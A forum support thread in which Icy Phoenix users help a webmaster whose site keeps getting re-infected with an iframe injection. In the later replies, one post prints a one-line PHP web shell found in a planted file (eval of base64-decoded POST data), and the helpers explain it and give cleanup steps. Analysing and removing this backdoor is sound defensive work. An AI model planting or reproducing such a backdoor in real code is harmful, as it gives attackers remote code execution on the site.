Icy Phoenix

Hello friends, this time I have the following little problem ... this is my forum that virus entered him a few weeks ago, after I transferred files hosting and got brand new ... not infected, but this day turned to infect my forum ... the virus is an iframe.

The truth that is a problem that tene me crazy, I hope to get some I can do and to resolve

Use the Version Icy Phoenix 1.3.0.53

My Forum website is: http://foro.mu-trujillo.net

Your site is considered as dangerous by google / firefox . . .
Anyway, did you AT LEAST tried to remove EVERY files and upload new ones ? If one of your file has been infected, it should clear the problem. Just reupload the site.

Also take a look to this topic. It may help you.

Yros wrote: [View Post]

Your site is considered as dangerous by google / firefox . . .
Anyway, did you AT LEAST tried to remove EVERY files and upload new ones ? If one of your file has been infected, it should clear the problem. Just reupload the site.

Also take a look to this topic. It may help you.

Hello, just came back up files completely new, even let my hosting totally empty but after a few days re-infect, was thinking that maybe there is someone behind this.

I can access just fine...

Google considers the sites dangerous when you have some virus or when you try to fraud people... It's not usual a normal website to be considered dangerous... Anyway, I think there's always a link saying "I am the webmaster, this is an error" or something like that, so you can try to make them to delete the warning.

Greets!

You should recheck all publicity placed by you on your site.

Google considers many anounces , that don´t come from itself ( google) as dangerous.

For example ( www.amigos.com)

It seems to be fixed, isn't it ?

Problem is . Once in the google Black-list. you stay there for about 90 days.

Hi, the problem is caused by a virus (iframe) and obviously when you have a virus on your website google website marks you as dangerous, the problem is how the virus infects my Forum is a big issue to me .... the only thing I do to fix it is delete everything and upload again ... but that's not a real solution because it is not infecting the Forum, sometimes the virus leaves you blank the forum as I now step ...

I hope you can help me thanks!

If you know where this comes from. you can try to block it out by ht.access file

The virus is the following script ...



Help Please !!

Script Virus View



Help Please

hey spydie, I await you do not mind me hijacking "your thread".

nvidia2012, have you tried to scan your computer with an up-to-date antirootkit, antivirus and antispyware (all of them, btw, that is the preferent order of scanning)?

If you do not have one or any of these kind of products, there are some of them available on the net for free for your installation lifetime (and with very good quality, BTW). You can PM me if you want and I will gladly make you know some of them.

BTW, do not relay on panda's cloud AV. It does not actually scan the files, while applying the full "scan" meaning.

If you are sure the virus is not on your computer, neither the server's files, try getting a full backup of all your icy tables in the DB, and find the string that is the virus url. I do recomend partial searches...

I recommend looking for:

Are you sure your hosting service is secure?

Some injections have been recently develepod to exploit some security holes in hosting services.

Mighty Gorgon wrote: [View Post]

Are you sure your hosting service is secure?

Some injections have been recently develepod to exploit some security holes in hosting services.

That is totally true, but I think we should first think around the posibility that the user had his own DB/scripts exploited, as long as he reports he has changed the hosting and the problem still persists.

But, in order to discard that, could you say us:

-If you are on a shared hosting, a VPS or a dedicated server?
-If you have any other server side software that is out-of-date, and therefore it cold be exploited, causing the problem?
-If you know any other users in your hosting service that could have the same problem of yours?

Please, note that if you are on a free hosting you could have migrated from a hoster to any of their resellers, or perhaps on the reverse way....

BTW, remember to review your CHMOD for all your files when you get rid of this nasty thing. It is the first common error among non-profesional developers (in which I must include myself, I am just an amateur....).

Hello.

I have reviewed the tables and the database and there is no sql injections or malicious code...

Did you check your cookie?

Mighty Gorgon wrote: [View Post]

Did you check your cookie?

Yes, it seems that someone is infected or at least the PC is infected ... antivirus knows someone who could fix the problem.

Hello.

State reviewing and within the images folder, I found a strange file that never was, it is: gifimg.php

In which your code is as follows ...





I hope I can help. Thanks

Definitely, someone exploited your files...

That code means... So this just gets some code through POST vars and executes it.

Try this: edit that file and replace all it's code with Then give that file read-only permissions (644).

It's not a definitive solution, but it might avoid the virus from appearing again.

Then check your files to see if you can find gifimg on it's content, or some base64_decode functions...
I suggest you to check common.php, includes/constants.php, includes/page_header.php..

KasLimon wrote: [View Post]

Definitely, someone exploited your files...

That code means...

Code: [Hide] [Select]

Code: [Show]

if(isset($_POST['e']))eval(base64_decode($_POST['e']));else die('404 Not Found');

So this just gets some code through POST vars and executes it.

Try this: edit that file and replace all it's code with

Code: [Hide] [Select]

Code: [Show]

<?php
die();
?>

Then give that file read-only permissions (644).

It's not a definitive solution, but it might avoid the virus from appearing again.

Then check your files to see if you can find gifimg on it's content, or some base64_decode functions...
I suggest you to check common.php, includes/constants.php, includes/page_header.php..

It the hacker is smart engough could have cloacked the file name, so check also for any eval fuction on all the website code.

BTW, this could be a bug in icy on in any other software you have....